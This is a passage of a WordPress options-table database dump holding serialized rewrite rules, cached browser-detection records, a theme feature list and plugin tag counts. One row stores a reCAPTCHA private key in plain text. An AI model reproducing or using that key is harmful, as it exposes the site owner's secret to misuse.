})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:42:\"featured-tools/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"featured-tools/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"featured-tools/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"featured-tools/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"featured-tools/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"featured-tools/([^/]+)/trackback/?$\";s:41:\"index.php?featured_tools=$matches[1]&tb=1\";s:43:\"featured-tools/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?featured_tools=$matches[1]&paged=$matches[2]\";s:50:\"featured-tools/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?featured_tools=$matches[1]&cpage=$matches[2]\";s:35:\"featured-tools/([^/]+)(/[0-9]+)?/?$\";s:53:\"index.php?featured_tools=$matches[1]&page=$matches[2]\";s:31:\"featured-tools/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"featured-tools/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"featured-tools/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"featured-tools/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"featured-tools/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"agent-tools/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:49:\"agent-tools/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:69:\"agent-tools/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"agent-tools/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:64:\"agent-tools/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"agent-tools/([^/]+)/trackback/?$\";s:38:\"index.php?agent_tools=$matches[1]&tb=1\";s:40:\"agent-tools/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?agent_tools=$matches[1]&paged=$matches[2]\";s:47:\"agent-tools/([^/]+)/comment-page-([0-9]{1,})/?$\";s:51:\"index.php?agent_tools=$matches[1]&cpage=$matches[2]\";s:32:\"agent-tools/([^/]+)(/[0-9]+)?/?$\";s:50:\"index.php?agent_tools=$matches[1]&page=$matches[2]\";s:28:\"agent-tools/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:38:\"agent-tools/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:58:\"agent-tools/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"agent-tools/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:53:\"agent-tools/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=6&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)(/[0-9]+)?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)(/[0-9]+)?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";}','yes'),(8244,'_site_transient_timeout_browser_43ae086f79b72e3cbf3a993e7f933943','1454005819','yes'),(8247,'_site_transient_browser_43ae086f79b72e3cbf3a993e7f933943','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:17:\"Internet Explorer\";s:7:\"version\";s:3:\"7.0\";s:10:\"update_url\";s:51:\"http://www.microsoft.com/windows/internet-explorer/\";s:7:\"img_src\";s:45:\"http://s.wordpress.org/images/browsers/ie.png\";s:11:\"img_src_ssl\";s:44:\"https://wordpress.org/images/browsers/ie.png\";s:15:\"current_version\";s:1:\"9\";s:7:\"upgrade\";b:1;s:8:\"insecure\";b:1;}','yes'),(8266,'_site_transient_timeout_browser_c6e0d466c988c4043691b020b1fec366','1454010384','yes'),(8269,'_site_transient_browser_c6e0d466c988c4043691b020b1fec366','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"47.0.2526.106\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(8289,'_site_transient_timeout_browser_13fe741da160361b3ae3b6ded1e92250','1454015877','yes'),(8292,'_site_transient_browser_13fe741da160361b3ae3b6ded1e92250','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"47.0.2526.111\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(8693,'_site_transient_timeout_browser_e69998cd166d0a716e585b452d0a9806','1454439937','yes'),(8695,'_site_transient_browser_e69998cd166d0a716e585b452d0a9806','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"47.0.2526.111\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(9054,'_site_transient_timeout_browser_75bcf3fb1ea8a998de66dc7b4f0e5167','1454711093','yes'),(9057,'_site_transient_browser_75bcf3fb1ea8a998de66dc7b4f0e5167','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Safari\";s:7:\"version\";s:5:\"9.0.3\";s:10:\"update_url\";s:28:\"http://www.apple.com/safari/\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/safari.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/safari.png\";s:15:\"current_version\";s:1:\"5\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(9242,'_site_transient_timeout_browser_6047a6c652d8edf3d2aa5f8bc09a20f3','1454875215','yes'),(9245,'_site_transient_browser_6047a6c652d8edf3d2aa5f8bc09a20f3','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:5:\"Opera\";s:7:\"version\";s:4:\"8.50\";s:10:\"update_url\";s:21:\"http://www.opera.com/\";s:7:\"img_src\";s:48:\"http://s.wordpress.org/images/browsers/opera.png\";s:11:\"img_src_ssl\";s:47:\"https://wordpress.org/images/browsers/opera.png\";s:15:\"current_version\";s:5:\"12.11\";s:7:\"upgrade\";b:1;s:8:\"insecure\";b:0;}','yes'),(9674,'_site_transient_timeout_browser_35411e3ca51e4e07b65c3f62d4872fa9','1455134982','yes'),(9677,'_site_transient_browser_35411e3ca51e4e07b65c3f62d4872fa9','a:9:{s:8:\"platform\";s:6:\"iPhone\";s:4:\"name\";s:6:\"iPhone\";s:7:\"version\";s:3:\"9.0\";s:10:\"update_url\";s:0:\"\";s:7:\"img_src\";s:0:\"\";s:11:\"img_src_ssl\";s:0:\"\";s:15:\"current_version\";s:0:\"\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(10113,'_site_transient_timeout_browser_2f4695c5cc6685ac05e383fb7004c5b1','1455643819','yes'),(10116,'_site_transient_browser_2f4695c5cc6685ac05e383fb7004c5b1','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"48.0.2564.97\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(10397,'_site_transient_timeout_browser_311d6a1f3d7a2713f5f9b6c4b6ccbc0b','1455836156','yes'),(10400,'_site_transient_browser_311d6a1f3d7a2713f5f9b6c4b6ccbc0b','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"48.0.2564.109\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(10412,'wpmembers_captcha','a:1:{s:9:\"recaptcha\";a:2:{s:6:\"public\";s:40:\"6LccEhgTAAAAAFiWR1tlFgCdC7JyCNe5dt0hfmtw\";s:7:\"private\";s:40:\"6LccEhgTAAAAAJvdrP7ERyqxQLxOMLSj3HMVYzmG\";}}','yes'),(11034,'_site_transient_timeout_browser_55c962b0d2c9f0f3c9d2ab481004218b','1456427616','yes'),(11037,'_site_transient_browser_55c962b0d2c9f0f3c9d2ab481004218b','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:6:\"15.0.2\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:1;s:8:\"insecure\";b:0;}','yes'),(11077,'_site_transient_timeout_browser_56873f21d505ef4e849ca48cbae4328a','1456452620','yes'),(11080,'_site_transient_browser_56873f21d505ef4e849ca48cbae4328a','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"15.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:1;s:8:\"insecure\";b:0;}','yes'),(11122,'_site_transient_timeout_browser_83271fd20a6687ffcd0d1b6f7ad13cdd','1456488157','yes'),(11125,'_site_transient_browser_83271fd20a6687ffcd0d1b6f7ad13cdd','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"38.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(11389,'_site_transient_timeout_browser_c6fadc46feda1fc49766039d7414e2c1','1456714878','yes'),(11392,'_site_transient_browser_c6fadc46feda1fc49766039d7414e2c1','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"29.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(11466,'_site_transient_timeout_browser_83f40cc3345c9e2ee3bcb45fce37906f','1456779989','yes'),(11469,'_site_transient_browser_83f40cc3345c9e2ee3bcb45fce37906f','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:6:\"15.0.2\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:1;s:8:\"insecure\";b:0;}','yes'),(11485,'_site_transient_timeout_browser_4f6496c61a087bc685085dc33952f925','1456780646','yes'),(11488,'_site_transient_browser_4f6496c61a087bc685085dc33952f925','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"48.0.2564.109\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(11532,'_site_transient_timeout_browser_2c1abc2fb0a3e3e0d0f6536694b27395','1456781287','yes'),(11535,'_site_transient_browser_2c1abc2fb0a3e3e0d0f6536694b27395','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:17:\"Internet Explorer\";s:7:\"version\";s:3:\"7.0\";s:10:\"update_url\";s:51:\"http://www.microsoft.com/windows/internet-explorer/\";s:7:\"img_src\";s:45:\"http://s.wordpress.org/images/browsers/ie.png\";s:11:\"img_src_ssl\";s:44:\"https://wordpress.org/images/browsers/ie.png\";s:15:\"current_version\";s:1:\"9\";s:7:\"upgrade\";b:1;s:8:\"insecure\";b:1;}','yes'),(11597,'_site_transient_timeout_browser_94cd9520d77c95ddf7527aa4b52c5a3e','1456863901','yes'),(11600,'_site_transient_browser_94cd9520d77c95ddf7527aa4b52c5a3e','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"20.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(11642,'_site_transient_timeout_wporg_theme_feature_list','1456290479','yes'),(11645,'_site_transient_wporg_theme_feature_list','a:4:{s:6:\"Colors\";a:15:{i:0;s:5:\"black\";i:1;s:4:\"blue\";i:2;s:5:\"brown\";i:3;s:4:\"gray\";i:4;s:5:\"green\";i:5;s:6:\"orange\";i:6;s:4:\"pink\";i:7;s:6:\"purple\";i:8;s:3:\"red\";i:9;s:6:\"silver\";i:10;s:3:\"tan\";i:11;s:5:\"white\";i:12;s:6:\"yellow\";i:13;s:4:\"dark\";i:14;s:5:\"light\";}s:6:\"Layout\";a:9:{i:0;s:12:\"fixed-layout\";i:1;s:12:\"fluid-layout\";i:2;s:17:\"responsive-layout\";i:3;s:10:\"one-column\";i:4;s:11:\"two-columns\";i:5;s:13:\"three-columns\";i:6;s:12:\"four-columns\";i:7;s:12:\"left-sidebar\";i:8;s:13:\"right-sidebar\";}s:8:\"Features\";a:20:{i:0;s:19:\"accessibility-ready\";i:1;s:8:\"blavatar\";i:2;s:10:\"buddypress\";i:3;s:17:\"custom-background\";i:4;s:13:\"custom-colors\";i:5;s:13:\"custom-header\";i:6;s:11:\"custom-menu\";i:7;s:12:\"editor-style\";i:8;s:21:\"featured-image-header\";i:9;s:15:\"featured-images\";i:10;s:15:\"flexible-header\";i:11;s:20:\"front-page-post-form\";i:12;s:19:\"full-width-template\";i:13;s:12:\"microformats\";i:14;s:12:\"post-formats\";i:15;s:20:\"rtl-language-support\";i:16;s:11:\"sticky-post\";i:17;s:13:\"theme-options\";i:18;s:17:\"threaded-comments\";i:19;s:17:\"translation-ready\";}s:7:\"Subject\";a:3:{i:0;s:7:\"holiday\";i:1;s:13:\"photoblogging\";i:2;s:8:\"seasonal\";}}','yes'),(11646,'_site_transient_timeout_browser_dcc1cb42ce725b19c07403fe6dd90c2d','1456884762','yes'),(11649,'_site_transient_browser_dcc1cb42ce725b19c07403fe6dd90c2d','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:6:\"16.0.1\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(11992,'_site_transient_timeout_browser_ebbd41fd44504768061882cdc07dacde','1457193342','yes'),(11995,'_site_transient_browser_ebbd41fd44504768061882cdc07dacde','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"41.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(12082,'_site_transient_timeout_browser_8d3c915e62d1b41ca0edf5042c5f9ec0','1457273315','yes'),(12085,'_site_transient_browser_8d3c915e62d1b41ca0edf5042c5f9ec0','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:6:\"15.0.1\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:1;s:8:\"insecure\";b:0;}','yes'),(12176,'category_children','a:0:{}','yes'),(12190,'_site_transient_timeout_browser_3cd52c8e792a5ed093637e7f6cc3d3de','1457366563','yes'),(12193,'_site_transient_browser_3cd52c8e792a5ed093637e7f6cc3d3de','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"48.0.2564.116\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(12403,'_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a','1456901967','yes'),(12406,'_site_transient_poptags_40cd750bba9870f18aada2478b24840a','a:100:{s:6:\"widget\";a:3:{s:4:\"name\";s:6:\"widget\";s:4:\"slug\";s:6:\"widget\";s:5:\"count\";s:4:\"5735\";}s:4:\"post\";a:3:{s:4:\"name\";s:4:\"Post\";s:4:\"slug\";s:4:\"post\";s:5:\"count\";s:4:\"3570\";}s:6:\"plugin\";a:3:{s:4:\"name\";s:6:\"plugin\";s:4:\"slug\";s:6:\"plugin\";s:5:\"count\";s:4:\"3532\";}s:5:\"admin\";a:3:{s:4:\"name\";s:5:\"admin\";s:4:\"slug\";s:5:\"admin\";s:5:\"count\";s:4:\"3034\";}s:5:\"posts\";a:3:{s:4:\"name\";s:5:\"posts\";s:4:\"slug\";s:5:\"posts\";s:5:\"count\";s:4:\"2753\";}s:9:\"shortcode\";a:3:{s:4:\"name\";s:9:\"shortcode\";s:4:\"slug\";s:9:\"shortcode\";s:5:\"count\";s:4:\"2266\";}s:7:\"sidebar\";a:3:{s:4:\"name\";s:7:\"sidebar\";s:4:\"slug\";s:7:\"sidebar\";s:5:\"count\";s:4:\"2177\";}s:6:\"google\";a:3:{s:4:\"name\";s:6:\"google\";s:4:\"slug\";s:6:\"google\";s:5:\"count\";s:4:\"2035\";}s:7:\"twitter\";a:3:{s:4:\"name\";s:7:\"twitter\";s:4:\"slug\";s:7:\"twitter\";s:5:\"count\";s:4:\"1986\";}s:4:\"page\";a:3:{s:4:\"name\";s:4:\"page\";s:4:\"slug\";s:4:\"page\";s:5:\"count\";s:4:\"1961\";}s:6:\"images\";a:3:{s:4:\"name\";s:6:\"images\";s:4:\"slug\";s:6:\"images\";s:5:\"count\";s:4:\"1954\";}s:8:\"comments\";a:3:{s:4:\"name\";s:8:\"comments\";s:4:\"slug\";s:8:\"comments\";s:5:\"count\";s:4:\"1909\";}s:5:\"image\";a:3:{s:4:\"name\";s:5:\"image\";s:4:\"slug\";s:5:\"image\";s:5:\"count\";s:4:\"1814\";}s:8:\"facebook\";a:3:{s:4:\"name\";s:8:\"Facebook\";s:4:\"slug\";s:8:\"facebook\";s:5:\"count\";s:4:\"1622\";}s:3:\"seo\";a:3:{s:4:\"name\";s:3:\"seo\";s:4:\"slug\";s:3:\"seo\";s:5:\"count\";s:4:\"1531\";}s:9:\"wordpress\";a:3:{s:4:\"name\";s:9:\"wordpress\";s:4:\"slug\";s:9:\"wordpress\";s:5:\"count\";s:4:\"1506\";}s:11:\"woocommerce\";a:3:{s:4:\"name\";s:11:\"woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:5:\"count\";s:4:\"1506\";}s:6:\"social\";a:3:{s:4